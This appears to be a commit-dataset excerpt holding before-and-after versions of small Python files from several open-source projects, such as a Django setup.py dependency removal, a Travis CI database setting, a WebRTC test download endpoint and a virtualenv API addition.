description="django-timepiece is a multi-user application for tracking "
"people's time on projects.",
classifiers=[
'Topic :: Internet :: WWW/HTTP :: Dynamic Content',
'Intended Audience :: Developers',
'License :: OSI Approved :: BSD License',
'Programming Language :: Python',
'Topic :: Software Development :: Libraries :: Python Modules',
'Development Status :: 4 - Beta',
'Operating System :: OS Independent',
],
install_requires = [
"python-dateutil==1.5",
"django-ajax-selects==1.1.4",
"django-pagination==1.0.7",
"textile==2.1.4",
"django-selectable==0.2.0",
],
)
<commit_msg>Remove textile requirement from install_requires<commit_after> | from setuptools import setup, find_packages
setup(
name='django-timepiece',
version=__import__('timepiece').__version__,
author='Caktus Consulting Group',
author_email='solutions@caktusgroup.com',
packages=find_packages(exclude=['example_project']),
include_package_data=True,
url='https://github.com/caktus/django-timepiece',
license='BSD',
long_description=open('README.rst').read(),
zip_safe=False, # because we're including media that Django needs
description="django-timepiece is a multi-user application for tracking "
"people's time on projects.",
classifiers=[
'Topic :: Internet :: WWW/HTTP :: Dynamic Content',
'Intended Audience :: Developers',
'License :: OSI Approved :: BSD License',
'Programming Language :: Python',
'Topic :: Software Development :: Libraries :: Python Modules',
'Development Status :: 4 - Beta',
'Operating System :: OS Independent',
],
install_requires = [
"python-dateutil==1.5",
"django-ajax-selects==1.1.4",
"django-pagination==1.0.7",
"django-selectable==0.2.0",
],
)
| from setuptools import setup, find_packages
setup(
name='django-timepiece',
version=__import__('timepiece').__version__,
author='Caktus Consulting Group',
author_email='solutions@caktusgroup.com',
packages=find_packages(exclude=['example_project']),
include_package_data=True,
url='https://github.com/caktus/django-timepiece',
license='BSD',
long_description=open('README.rst').read(),
zip_safe=False, # because we're including media that Django needs
description="django-timepiece is a multi-user application for tracking "
"people's time on projects.",
classifiers=[
'Topic :: Internet :: WWW/HTTP :: Dynamic Content',
'Intended Audience :: Developers',
'License :: OSI Approved :: BSD License',
'Programming Language :: Python',
'Topic :: Software Development :: Libraries :: Python Modules',
'Development Status :: 4 - Beta',
'Operating System :: OS Independent',
],
install_requires = [
"python-dateutil==1.5",
"django-ajax-selects==1.1.4",
"django-pagination==1.0.7",
"textile==2.1.4",
"django-selectable==0.2.0",
],
)
Remove textile requirement from install_requiresfrom setuptools import setup, find_packages
setup(
name='django-timepiece',
version=__import__('timepiece').__version__,
author='Caktus Consulting Group',
author_email='solutions@caktusgroup.com',
packages=find_packages(exclude=['example_project']),
include_package_data=True,
url='https://github.com/caktus/django-timepiece',
license='BSD',
long_description=open('README.rst').read(),
zip_safe=False, # because we're including media that Django needs
description="django-timepiece is a multi-user application for tracking "
"people's time on projects.",
classifiers=[
'Topic :: Internet :: WWW/HTTP :: Dynamic Content',
'Intended Audience :: Developers',
'License :: OSI Approved :: BSD License',
'Programming Language :: Python',
'Topic :: Software Development :: Libraries :: Python Modules',
'Development Status :: 4 - Beta',
'Operating System :: OS Independent',
],
install_requires = [
"python-dateutil==1.5",
"django-ajax-selects==1.1.4",
"django-pagination==1.0.7",
"django-selectable==0.2.0",
],
)
| <commit_before>from setuptools import setup, find_packages
setup(
name='django-timepiece',
version=__import__('timepiece').__version__,
author='Caktus Consulting Group',
author_email='solutions@caktusgroup.com',
packages=find_packages(exclude=['example_project']),
include_package_data=True,
url='https://github.com/caktus/django-timepiece',
license='BSD',
long_description=open('README.rst').read(),
zip_safe=False, # because we're including media that Django needs
description="django-timepiece is a multi-user application for tracking "
"people's time on projects.",
classifiers=[
'Topic :: Internet :: WWW/HTTP :: Dynamic Content',
'Intended Audience :: Developers',
'License :: OSI Approved :: BSD License',
'Programming Language :: Python',
'Topic :: Software Development :: Libraries :: Python Modules',
'Development Status :: 4 - Beta',
'Operating System :: OS Independent',
],
install_requires = [
"python-dateutil==1.5",
"django-ajax-selects==1.1.4",
"django-pagination==1.0.7",
"textile==2.1.4",
"django-selectable==0.2.0",
],
)
<commit_msg>Remove textile requirement from install_requires<commit_after>from setuptools import setup, find_packages
setup(
name='django-timepiece',
version=__import__('timepiece').__version__,
author='Caktus Consulting Group',
author_email='solutions@caktusgroup.com',
packages=find_packages(exclude=['example_project']),
include_package_data=True,
url='https://github.com/caktus/django-timepiece',
license='BSD',
long_description=open('README.rst').read(),
zip_safe=False, # because we're including media that Django needs
description="django-timepiece is a multi-user application for tracking "
"people's time on projects.",
classifiers=[
'Topic :: Internet :: WWW/HTTP :: Dynamic Content',
'Intended Audience :: Developers',
'License :: OSI Approved :: BSD License',
'Programming Language :: Python',
'Topic :: Software Development :: Libraries :: Python Modules',
'Development Status :: 4 - Beta',
'Operating System :: OS Independent',
],
install_requires = [
"python-dateutil==1.5",
"django-ajax-selects==1.1.4",
"django-pagination==1.0.7",
"django-selectable==0.2.0",
],
)
|
c8360831ab2fa4d5af2929a85beca4a1f33ef9d1 | travis_settings.py | travis_settings.py | # Settings used for running tests in Travis
#
# Load default settings
# noinspection PyUnresolvedReferences
from settings import *
# Database
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3', # 'postgresql_psycopg2', 'mysql', 'sqlite3' or 'oracle'.
'NAME': 'alexia_test', # Of pad naar sqlite3 database
# Hieronder negeren voor sqlite3
'USER': '',
'PASSWORD': '',
'HOST': '', # Leeg voor localhost
'PORT': '', # Leeg is default
}
}
SECRET_KEY = 'zBCMvM1BwLtlkoXf1mbgCo3W60j2UgIPhevmEJ9cMPft2JtUk5'
| # Settings used for running tests in Travis
#
# Load default settings
# noinspection PyUnresolvedReferences
from settings import *
# Database
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.mysql', # 'postgresql_psycopg2', 'mysql', 'sqlite3' or 'oracle'.
'NAME': 'alexia_test', # Of pad naar sqlite3 database
# Hieronder negeren voor sqlite3
'USER': 'travis',
'PASSWORD': '',
'HOST': '', # Leeg voor localhost
'PORT': '', # Leeg is default
}
}
SECRET_KEY = 'zBCMvM1BwLtlkoXf1mbgCo3W60j2UgIPhevmEJ9cMPft2JtUk5'
| Use MySQL database backend in Travis CI. | Use MySQL database backend in Travis CI.
| Python | bsd-3-clause | Inter-Actief/alexia,Inter-Actief/alexia,Inter-Actief/alexia,Inter-Actief/alexia | # Settings used for running tests in Travis
#
# Load default settings
# noinspection PyUnresolvedReferences
from settings import *
# Database
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3', # 'postgresql_psycopg2', 'mysql', 'sqlite3' or 'oracle'.
'NAME': 'alexia_test', # Of pad naar sqlite3 database
# Hieronder negeren voor sqlite3
'USER': '',
'PASSWORD': '',
'HOST': '', # Leeg voor localhost
'PORT': '', # Leeg is default
}
}
SECRET_KEY = 'zBCMvM1BwLtlkoXf1mbgCo3W60j2UgIPhevmEJ9cMPft2JtUk5'
Use MySQL database backend in Travis CI. | # Settings used for running tests in Travis
#
# Load default settings
# noinspection PyUnresolvedReferences
from settings import *
# Database
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.mysql', # 'postgresql_psycopg2', 'mysql', 'sqlite3' or 'oracle'.
'NAME': 'alexia_test', # Of pad naar sqlite3 database
# Hieronder negeren voor sqlite3
'USER': 'travis',
'PASSWORD': '',
'HOST': '', # Leeg voor localhost
'PORT': '', # Leeg is default
}
}
SECRET_KEY = 'zBCMvM1BwLtlkoXf1mbgCo3W60j2UgIPhevmEJ9cMPft2JtUk5'
| <commit_before># Settings used for running tests in Travis
#
# Load default settings
# noinspection PyUnresolvedReferences
from settings import *
# Database
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3', # 'postgresql_psycopg2', 'mysql', 'sqlite3' or 'oracle'.
'NAME': 'alexia_test', # Of pad naar sqlite3 database
# Hieronder negeren voor sqlite3
'USER': '',
'PASSWORD': '',
'HOST': '', # Leeg voor localhost
'PORT': '', # Leeg is default
}
}
SECRET_KEY = 'zBCMvM1BwLtlkoXf1mbgCo3W60j2UgIPhevmEJ9cMPft2JtUk5'
<commit_msg>Use MySQL database backend in Travis CI.<commit_after> | # Settings used for running tests in Travis
#
# Load default settings
# noinspection PyUnresolvedReferences
from settings import *
# Database
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.mysql', # 'postgresql_psycopg2', 'mysql', 'sqlite3' or 'oracle'.
'NAME': 'alexia_test', # Of pad naar sqlite3 database
# Hieronder negeren voor sqlite3
'USER': 'travis',
'PASSWORD': '',
'HOST': '', # Leeg voor localhost
'PORT': '', # Leeg is default
}
}
SECRET_KEY = 'zBCMvM1BwLtlkoXf1mbgCo3W60j2UgIPhevmEJ9cMPft2JtUk5'
| # Settings used for running tests in Travis
#
# Load default settings
# noinspection PyUnresolvedReferences
from settings import *
# Database
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3', # 'postgresql_psycopg2', 'mysql', 'sqlite3' or 'oracle'.
'NAME': 'alexia_test', # Of pad naar sqlite3 database
# Hieronder negeren voor sqlite3
'USER': '',
'PASSWORD': '',
'HOST': '', # Leeg voor localhost
'PORT': '', # Leeg is default
}
}
SECRET_KEY = 'zBCMvM1BwLtlkoXf1mbgCo3W60j2UgIPhevmEJ9cMPft2JtUk5'
Use MySQL database backend in Travis CI.# Settings used for running tests in Travis
#
# Load default settings
# noinspection PyUnresolvedReferences
from settings import *
# Database
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.mysql', # 'postgresql_psycopg2', 'mysql', 'sqlite3' or 'oracle'.
'NAME': 'alexia_test', # Of pad naar sqlite3 database
# Hieronder negeren voor sqlite3
'USER': 'travis',
'PASSWORD': '',
'HOST': '', # Leeg voor localhost
'PORT': '', # Leeg is default
}
}
SECRET_KEY = 'zBCMvM1BwLtlkoXf1mbgCo3W60j2UgIPhevmEJ9cMPft2JtUk5'
| <commit_before># Settings used for running tests in Travis
#
# Load default settings
# noinspection PyUnresolvedReferences
from settings import *
# Database
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3', # 'postgresql_psycopg2', 'mysql', 'sqlite3' or 'oracle'.
'NAME': 'alexia_test', # Of pad naar sqlite3 database
# Hieronder negeren voor sqlite3
'USER': '',
'PASSWORD': '',
'HOST': '', # Leeg voor localhost
'PORT': '', # Leeg is default
}
}
SECRET_KEY = 'zBCMvM1BwLtlkoXf1mbgCo3W60j2UgIPhevmEJ9cMPft2JtUk5'
<commit_msg>Use MySQL database backend in Travis CI.<commit_after># Settings used for running tests in Travis
#
# Load default settings
# noinspection PyUnresolvedReferences
from settings import *
# Database
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.mysql', # 'postgresql_psycopg2', 'mysql', 'sqlite3' or 'oracle'.
'NAME': 'alexia_test', # Of pad naar sqlite3 database
# Hieronder negeren voor sqlite3
'USER': 'travis',
'PASSWORD': '',
'HOST': '', # Leeg voor localhost
'PORT': '', # Leeg is default
}
}
SECRET_KEY = 'zBCMvM1BwLtlkoXf1mbgCo3W60j2UgIPhevmEJ9cMPft2JtUk5'
|
b69f69b0e89a49b427292ec179e12bdee6fb4743 | samples/web/content/testrtc/testrtc.py | samples/web/content/testrtc/testrtc.py | #!/usr/bin/python2.4
#
# Copyright 2014 Google Inc. All Rights Reserved.
"""WebRTC Test
This module serves the WebRTC Test Page.
"""
import cgi
import logging
import os
import jinja2
import webapp2
jinja_environment = jinja2.Environment(
loader=jinja2.FileSystemLoader(os.path.dirname(__file__)))
class MainPage(webapp2.RequestHandler):
"""The main UI page, renders the 'index.html' template."""
def get(self):
template = jinja_environment.get_template('index.html')
content = template.render({})
self.response.out.write(content)
app = webapp2.WSGIApplication([
('/', MainPage),
], debug=True)
| #!/usr/bin/python2.4
#
# Copyright 2014 Google Inc. All Rights Reserved.
"""WebRTC Test
This module serves the WebRTC Test Page.
"""
import cgi
import logging
import random
import os
import jinja2
import webapp2
jinja_environment = jinja2.Environment(
loader=jinja2.FileSystemLoader(os.path.dirname(__file__)))
# Generate 10 kilobytes of random data and create a 10MB buffer from it.
random_file = bytearray([random.randint(0,127) for i in xrange(0,10000)] * 1000)
class MainPage(webapp2.RequestHandler):
"""The main UI page, renders the 'index.html' template."""
def get(self):
template = jinja_environment.get_template('index.html')
content = template.render({})
self.response.out.write(content)
class TestDownloadFile(webapp2.RequestHandler):
def get(self, size_kbytes):
self.response.headers.add_header("Access-Control-Allow-Origin", "*")
self.response.headers['Content-Type'] = 'application/octet-stream'
self.response.out.write(random_file[0: int(size_kbytes)*1000])
app = webapp2.WSGIApplication([
('/', MainPage),
(r'/test-download-file/(\d?\d00)KB.data', TestDownloadFile),
], debug=True)
| Add ability to download a random file with a given size from any domain. | Add ability to download a random file with a given size from any domain.
| Python | bsd-3-clause | xdumaine/adapter,mulyoved/samples,ralic/testrtc,82488059/apprtc,mauricionr/samples,smayoorans/samples,shelsonjava/testrtc,4lejandrito/adapter,TribeMedia/testrtc,YouthAndra/apprtc,JiYou/apprtc,fetterov/samples,82488059/apprtc,webrtc/samples,TribeMedia/samples,dengshaodong/docker-apprtc,4lejandrito/adapter,diddie06/webrtc,smbale/samples,jjrasche/cell-based-RC-control,bpyoung92/apprtc,todotobe1/samples,fippo/webrtc,virajs/samples,webrtc/testrtc,oliverhuangchao/samples,jjrasche/cell-based-RC-control,samdutton/webrtc,YouthAndra/apprtc,volkanh/volkanh.github.io,MahmoudFouad/samples,jjrasche/cell-based-RC-control,tsruban/samples,calebboyd/adapter,b-cuts/samples,jan-ivar/samples,tsruban/samples,Edward-Shawn/samples,JiYou/apprtc,shelsonjava/apprtc,procandi/apprtc,aadebuger/docker-apprtc,TribeMedia/apprtc,smadhusu/AppRTC,smbale/samples,jarl-alejandro/apprtc,shaohung001/samples,MahmoudFouad/samples,guoweis/webrtc,mvenkatesh431/apprtc,shelsonjava/apprtc,overtakermtg/samples,arnauorriols/apprtc,arnauorriols/apprtc,shaohung001/samples,oliverhuangchao/samples,jessetane/testrtc,todotobe1/apprtc,smadhusu/AppRTC,samdutton/webrtc,TribeMedia/testrtc,akashrchoksi/newone,shelsonjava/testrtc,dushmis/webrtc,bbandaru/samples,pquochoang/samples,myself659/samples,smadhusu/AppRTC,bemasc/samples,arnauorriols/apprtc,YouthAndra/apprtc,dengshaodong/docker-apprtc,samdutton/apprtc,kod3r/samples,martin7890/samples,webrtc/apprtc,jan-ivar/samples,TribeMedia/apprtc,fippo/apprtc,shelsonjava/samples,jarl-alejandro/apprtc,mvenkatesh431/apprtc,jarl-alejandro/apprtc,arnauorriols/apprtc,harme199497/adapter,mauricionr/samples,shelsonjava/apprtc,webrtc/adapter,TribeMedia/testrtc,82488059/apprtc,Edward-Shawn/samples,bpyoung92/apprtc,aadebuger/docker-apprtc,YouthAndra/apprtc,virajs/testrtc,Roarz/samples,pquochoang/samples,kod3r/samples,bbandaru/samples,Edward-Shawn/samples,todotobe1/samples,askdaddy/samples,4lejandrito/adapter,jiayliu/apprtc,xdumaine/samples,virajs/apprtc,dajise/samples,
martin7890/samples,bpyoung92/apprtc,Roarz/samples,webrtc/apprtc,arnauorriols/apprtc,mvenkatesh431/samples,jarl-alejandro/apprtc,knightsofaa/webrtc,mulyoved/samples,leehz/samples,mvenkatesh431/apprtc,fippo/apprtc,shelsonjava/samples,jiayliu/apprtc,akashrchoksi/newone,b-cuts/samples,Acidburn0zzz/adapter,todotobe1/apprtc,dajise/samples,calebboyd/adapter,virajs/apprtc,procandi/apprtc,smayoorans/samples,JiYou/apprtc,keshwans/samples,mvenkatesh431/apprtc,TribeMedia/samples,harme199497/adapter,fippo/webrtc,TheKnarf/apprtc,virajs/samples,EmreAkkoyun/sample,fitraditya/samples,overtakermtg/samples,xdumaine/samples,virajs/apprtc,YouthAndra/apprtc,TribeMedia/apprtc,Roarz/samples,ralic/testrtc,samdutton/apprtc,fitraditya/samples,Zauberstuhl/adapter,jessetane/testrtc,juberti/samples,jiayliu/apprtc,jessetane/testrtc,shelsonjava/testrtc,shelsonjava/samples,fetterov/samples,ralic/testrtc,Acidburn0zzz/adapter,jarl-alejandro/apprtc,fippo/apprtc,TribeMedia/testrtc,JiYou/apprtc,TribeMedia/apprtc,shines/adapter,smayoorans/samples,myself659/samples,bemasc/samples,jan-ivar/adapter,EmreAkkoyun/sample,oliverhuangchao/samples,virajs/testrtc,webrtc/testrtc,smadhusu/AppRTC,overtakermtg/samples,calebboyd/adapter,procandi/apprtc,pquochoang/samples,virajs/samples,TheKnarf/apprtc,mauricionr/samples,dajise/samples,martin7890/samples,bemasc/samples,Zauberstuhl/adapter,shelsonjava/apprtc,smadhusu/AppRTC,virajs/apprtc,jjrasche/cell-based-RC-control,samdutton/apprtc,leehz/samples,todotobe1/apprtc,juberti/samples,tsruban/samples,fippo/apprtc,xdumaine/samples,dengshaodong/docker-apprtc,dengshaodong/docker-apprtc,EmreAkkoyun/sample,bpyoung92/apprtc,b-cuts/samples,guoweis/webrtc,MahmoudFouad/samples,Acidburn0zzz/adapter,taylor-b/samples,leehz/samples,jessetane/testrtc,mvenkatesh431/apprtc,todotobe1/apprtc,smbale/samples,aadebuger/docker-apprtc,samdutton/apprtc,shines/adapter,guoweis/webrtc,aadebuger/docker-apprtc,procandi/apprtc,jiayliu/apprtc,procandi/samples,webrtc/apprtc,JiYou/apprtc,mvenkatesh431/sample
s,harme199497/adapter,TheKnarf/apprtc,TheKnarf/apprtc,keshwans/samples,procandi/samples,jan-ivar/adapter,mvenkatesh431/samples,bbandaru/samples,82488059/apprtc,shelsonjava/apprtc,samdutton/apprtc,webrtc/adapter,volkanh/volkanh.github.io,TribeMedia/apprtc,ralic/samples,shelsonjava/testrtc,mulyoved/samples,shines/adapter,bpyoung92/apprtc,ralic/testrtc,fetterov/samples,virajs/testrtc,virajs/testrtc,fitraditya/samples,dengshaodong/docker-apprtc,82488059/apprtc,TheKnarf/apprtc,procandi/apprtc,webrtc/apprtc,myself659/samples,Zauberstuhl/adapter,fippo/apprtc,knightsofaa/webrtc,TribeMedia/samples,kod3r/samples,todotobe1/apprtc,jiayliu/apprtc,akashrchoksi/newone,askdaddy/samples,ralic/samples,volkanh/volkanh.github.io,xdumaine/adapter,virajs/apprtc,procandi/samples,diddie06/webrtc,taylor-b/samples,dushmis/webrtc,aadebuger/docker-apprtc,todotobe1/samples,webrtc/apprtc,webrtc/samples,ralic/samples | #!/usr/bin/python2.4
#
# Copyright 2014 Google Inc. All Rights Reserved.
"""WebRTC Test
This module serves the WebRTC Test Page.
"""
import cgi
import logging
import os
import jinja2
import webapp2
jinja_environment = jinja2.Environment(
loader=jinja2.FileSystemLoader(os.path.dirname(__file__)))
class MainPage(webapp2.RequestHandler):
"""The main UI page, renders the 'index.html' template."""
def get(self):
template = jinja_environment.get_template('index.html')
content = template.render({})
self.response.out.write(content)
app = webapp2.WSGIApplication([
('/', MainPage),
], debug=True)
Add ability to download a random file with a given size from any domain. | #!/usr/bin/python2.4
#
# Copyright 2014 Google Inc. All Rights Reserved.
"""WebRTC Test
This module serves the WebRTC Test Page.
"""
import cgi
import logging
import random
import os
import jinja2
import webapp2
jinja_environment = jinja2.Environment(
loader=jinja2.FileSystemLoader(os.path.dirname(__file__)))
# Generate 10 kilobytes of random data and create a 10MB buffer from it.
random_file = bytearray([random.randint(0,127) for i in xrange(0,10000)] * 1000)
class MainPage(webapp2.RequestHandler):
"""The main UI page, renders the 'index.html' template."""
def get(self):
template = jinja_environment.get_template('index.html')
content = template.render({})
self.response.out.write(content)
class TestDownloadFile(webapp2.RequestHandler):
def get(self, size_kbytes):
self.response.headers.add_header("Access-Control-Allow-Origin", "*")
self.response.headers['Content-Type'] = 'application/octet-stream'
self.response.out.write(random_file[0: int(size_kbytes)*1000])
app = webapp2.WSGIApplication([
('/', MainPage),
(r'/test-download-file/(\d?\d00)KB.data', TestDownloadFile),
], debug=True)
| <commit_before>#!/usr/bin/python2.4
#
# Copyright 2014 Google Inc. All Rights Reserved.
"""WebRTC Test
This module serves the WebRTC Test Page.
"""
import cgi
import logging
import os
import jinja2
import webapp2
jinja_environment = jinja2.Environment(
loader=jinja2.FileSystemLoader(os.path.dirname(__file__)))
class MainPage(webapp2.RequestHandler):
"""The main UI page, renders the 'index.html' template."""
def get(self):
template = jinja_environment.get_template('index.html')
content = template.render({})
self.response.out.write(content)
app = webapp2.WSGIApplication([
('/', MainPage),
], debug=True)
<commit_msg>Add ability to download a random file with a given size from any domain.<commit_after> | #!/usr/bin/python2.4
#
# Copyright 2014 Google Inc. All Rights Reserved.
"""WebRTC Test
This module serves the WebRTC Test Page.
"""
import cgi
import logging
import random
import os
import jinja2
import webapp2
jinja_environment = jinja2.Environment(
loader=jinja2.FileSystemLoader(os.path.dirname(__file__)))
# Generate 10 kilobytes of random data and create a 10MB buffer from it.
random_file = bytearray([random.randint(0,127) for i in xrange(0,10000)] * 1000)
class MainPage(webapp2.RequestHandler):
"""The main UI page, renders the 'index.html' template."""
def get(self):
template = jinja_environment.get_template('index.html')
content = template.render({})
self.response.out.write(content)
class TestDownloadFile(webapp2.RequestHandler):
def get(self, size_kbytes):
self.response.headers.add_header("Access-Control-Allow-Origin", "*")
self.response.headers['Content-Type'] = 'application/octet-stream'
self.response.out.write(random_file[0: int(size_kbytes)*1000])
app = webapp2.WSGIApplication([
('/', MainPage),
(r'/test-download-file/(\d?\d00)KB.data', TestDownloadFile),
], debug=True)
| #!/usr/bin/python2.4
#
# Copyright 2014 Google Inc. All Rights Reserved.
"""WebRTC Test
This module serves the WebRTC Test Page.
"""
import cgi
import logging
import os
import jinja2
import webapp2
jinja_environment = jinja2.Environment(
loader=jinja2.FileSystemLoader(os.path.dirname(__file__)))
class MainPage(webapp2.RequestHandler):
"""The main UI page, renders the 'index.html' template."""
def get(self):
template = jinja_environment.get_template('index.html')
content = template.render({})
self.response.out.write(content)
app = webapp2.WSGIApplication([
('/', MainPage),
], debug=True)
Add ability to download a random file with a given size from any domain.#!/usr/bin/python2.4
#
# Copyright 2014 Google Inc. All Rights Reserved.
"""WebRTC Test
This module serves the WebRTC Test Page.
"""
import cgi
import logging
import random
import os
import jinja2
import webapp2
jinja_environment = jinja2.Environment(
loader=jinja2.FileSystemLoader(os.path.dirname(__file__)))
# Generate 10 kilobytes of random data and create a 10MB buffer from it.
random_file = bytearray([random.randint(0,127) for i in xrange(0,10000)] * 1000)
class MainPage(webapp2.RequestHandler):
"""The main UI page, renders the 'index.html' template."""
def get(self):
template = jinja_environment.get_template('index.html')
content = template.render({})
self.response.out.write(content)
class TestDownloadFile(webapp2.RequestHandler):
def get(self, size_kbytes):
self.response.headers.add_header("Access-Control-Allow-Origin", "*")
self.response.headers['Content-Type'] = 'application/octet-stream'
self.response.out.write(random_file[0: int(size_kbytes)*1000])
app = webapp2.WSGIApplication([
('/', MainPage),
(r'/test-download-file/(\d?\d00)KB.data', TestDownloadFile),
], debug=True)
| <commit_before>#!/usr/bin/python2.4
#
# Copyright 2014 Google Inc. All Rights Reserved.
"""WebRTC Test
This module serves the WebRTC Test Page.
"""
import cgi
import logging
import os
import jinja2
import webapp2
jinja_environment = jinja2.Environment(
loader=jinja2.FileSystemLoader(os.path.dirname(__file__)))
class MainPage(webapp2.RequestHandler):
"""The main UI page, renders the 'index.html' template."""
def get(self):
template = jinja_environment.get_template('index.html')
content = template.render({})
self.response.out.write(content)
app = webapp2.WSGIApplication([
('/', MainPage),
], debug=True)
<commit_msg>Add ability to download a random file with a given size from any domain.<commit_after>#!/usr/bin/python2.4
#
# Copyright 2014 Google Inc. All Rights Reserved.
"""WebRTC Test
This module serves the WebRTC Test Page.
"""
import cgi
import logging
import random
import os
import jinja2
import webapp2
jinja_environment = jinja2.Environment(
loader=jinja2.FileSystemLoader(os.path.dirname(__file__)))
# Generate 10 kilobytes of random data and create a 10MB buffer from it.
random_file = bytearray([random.randint(0,127) for i in xrange(0,10000)] * 1000)
class MainPage(webapp2.RequestHandler):
"""The main UI page, renders the 'index.html' template."""
def get(self):
template = jinja_environment.get_template('index.html')
content = template.render({})
self.response.out.write(content)
class TestDownloadFile(webapp2.RequestHandler):
def get(self, size_kbytes):
self.response.headers.add_header("Access-Control-Allow-Origin", "*")
self.response.headers['Content-Type'] = 'application/octet-stream'
self.response.out.write(random_file[0: int(size_kbytes)*1000])
app = webapp2.WSGIApplication([
('/', MainPage),
(r'/test-download-file/(\d?\d00)KB.data', TestDownloadFile),
], debug=True)
|
95ebac75381580fe3767d7c9e287226a75bc43bf | elections/kenya/lib.py | elections/kenya/lib.py | from __future__ import unicode_literals
import re
def shorten_post_label(post_label):
return re.sub(r'^Member of Parliament for ', '', post_label)
| from __future__ import unicode_literals
import re
def shorten_post_label(post_label):
return re.sub(r'^(County Assembly Member for|Member of the National Assembly for|County Governor for|Women Representative for|Senator for|President of)\s+', '', post_label)
| Implement post label abbreviation for current posts | KE: Implement post label abbreviation for current posts
| Python | agpl-3.0 | mysociety/yournextrepresentative,mysociety/yournextmp-popit,mysociety/yournextrepresentative,mysociety/yournextrepresentative,mysociety/yournextmp-popit,mysociety/yournextrepresentative,mysociety/yournextmp-popit,mysociety/yournextmp-popit,mysociety/yournextmp-popit,mysociety/yournextrepresentative | from __future__ import unicode_literals
import re
def shorten_post_label(post_label):
return re.sub(r'^Member of Parliament for ', '', post_label)
KE: Implement post label abbreviation for current posts | from __future__ import unicode_literals
import re
def shorten_post_label(post_label):
return re.sub(r'^(County Assembly Member for|Member of the National Assembly for|County Governor for|Women Representative for|Senator for|President of)\s+', '', post_label)
| <commit_before>from __future__ import unicode_literals
import re
def shorten_post_label(post_label):
return re.sub(r'^Member of Parliament for ', '', post_label)
<commit_msg>KE: Implement post label abbreviation for current posts<commit_after> | from __future__ import unicode_literals
import re
def shorten_post_label(post_label):
return re.sub(r'^(County Assembly Member for|Member of the National Assembly for|County Governor for|Women Representative for|Senator for|President of)\s+', '', post_label)
| from __future__ import unicode_literals
import re
def shorten_post_label(post_label):
return re.sub(r'^Member of Parliament for ', '', post_label)
KE: Implement post label abbreviation for current postsfrom __future__ import unicode_literals
import re
def shorten_post_label(post_label):
return re.sub(r'^(County Assembly Member for|Member of the National Assembly for|County Governor for|Women Representative for|Senator for|President of)\s+', '', post_label)
| <commit_before>from __future__ import unicode_literals
import re
def shorten_post_label(post_label):
return re.sub(r'^Member of Parliament for ', '', post_label)
<commit_msg>KE: Implement post label abbreviation for current posts<commit_after>from __future__ import unicode_literals
import re
def shorten_post_label(post_label):
return re.sub(r'^(County Assembly Member for|Member of the National Assembly for|County Governor for|Women Representative for|Senator for|President of)\s+', '', post_label)
|
17cee8fe32a38f976e8548993fa57857f84943ef | pastas/version.py | pastas/version.py | # This is the only location where the version will be written and changed.
# Based on https://packaging.python.org/single_source_version/
__version__ = '0.20.0b'
| # This is the only location where the version will be written and changed.
# Based on https://packaging.python.org/single_source_version/
__version__ = '0.20.0'
| Prepare update of Master to v0.20.0 | Prepare update of Master to v0.20.0
| Python | mit | pastas/pastas | # This is the only location where the version will be written and changed.
# Based on https://packaging.python.org/single_source_version/
__version__ = '0.20.0b'
Prepare update of Master to v0.20.0 | # This is the only location where the version will be written and changed.
# Based on https://packaging.python.org/single_source_version/
__version__ = '0.20.0'
| <commit_before># This is the only location where the version will be written and changed.
# Based on https://packaging.python.org/single_source_version/
__version__ = '0.20.0b'
<commit_msg>Prepare update of Master to v0.20.0<commit_after> | # This is the only location where the version will be written and changed.
# Based on https://packaging.python.org/single_source_version/
__version__ = '0.20.0'
| # This is the only location where the version will be written and changed.
# Based on https://packaging.python.org/single_source_version/
__version__ = '0.20.0b'
Prepare update of Master to v0.20.0# This is the only location where the version will be written and changed.
# Based on https://packaging.python.org/single_source_version/
__version__ = '0.20.0'
| <commit_before># This is the only location where the version will be written and changed.
# Based on https://packaging.python.org/single_source_version/
__version__ = '0.20.0b'
<commit_msg>Prepare update of Master to v0.20.0<commit_after># This is the only location where the version will be written and changed.
# Based on https://packaging.python.org/single_source_version/
__version__ = '0.20.0'
|
3830ef5200f3d1763be5d162f5123cd59ca1da0b | virtualenv/__init__.py | virtualenv/__init__.py | from __future__ import absolute_import, division, print_function
from virtualenv.__about__ import (
__author__, __copyright__, __email__, __license__, __summary__, __title__,
__uri__, __version__
)
from virtualenv.core import create
def create_environment(
home_dir,
site_packages=False, clear=False,
unzip_setuptools=False,
prompt=None, search_dirs=None, never_download=False,
no_setuptools=False, no_pip=False, symlink=True
):
create(
home_dir,
system_site_packages=site_packages,
clear=clear,
prompt=prompt or "",
extra_search_dirs=search_dirs,
setuptools=not no_setuptools,
pip=not no_pip
)
__all__ = [
"__title__", "__summary__", "__uri__", "__version__", "__author__",
"__email__", "__license__", "__copyright__",
"create",
]
| from __future__ import absolute_import, division, print_function
from virtualenv.__about__ import (
__author__, __copyright__, __email__, __license__, __summary__, __title__,
__uri__, __version__
)
# some support for old api in legacy virtualenv
from virtualenv.core import create
from virtualenv.__main__ import main # flake8: noqa
__all__ = [
"__title__", "__summary__", "__uri__", "__version__", "__author__",
"__email__", "__license__", "__copyright__",
"create", "create_environment", "main",
]
def create_environment(
home_dir,
site_packages=False, clear=False,
unzip_setuptools=False,
prompt=None, search_dirs=None, never_download=False,
no_setuptools=False, no_pip=False, symlink=True
): # flake8: noqa
create(
home_dir,
system_site_packages=site_packages,
clear=clear,
prompt=prompt or "",
extra_search_dirs=search_dirs,
setuptools=not no_setuptools,
pip=not no_pip
)
| Add a main function (more support for the api in the legacy virtualenv). | Add a main function (more support for the api in the legacy virtualenv).
| Python | mit | ionelmc/virtualenv,ionelmc/virtualenv,ionelmc/virtualenv | from __future__ import absolute_import, division, print_function
from virtualenv.__about__ import (
__author__, __copyright__, __email__, __license__, __summary__, __title__,
__uri__, __version__
)
from virtualenv.core import create
def create_environment(
home_dir,
site_packages=False, clear=False,
unzip_setuptools=False,
prompt=None, search_dirs=None, never_download=False,
no_setuptools=False, no_pip=False, symlink=True
):
create(
home_dir,
system_site_packages=site_packages,
clear=clear,
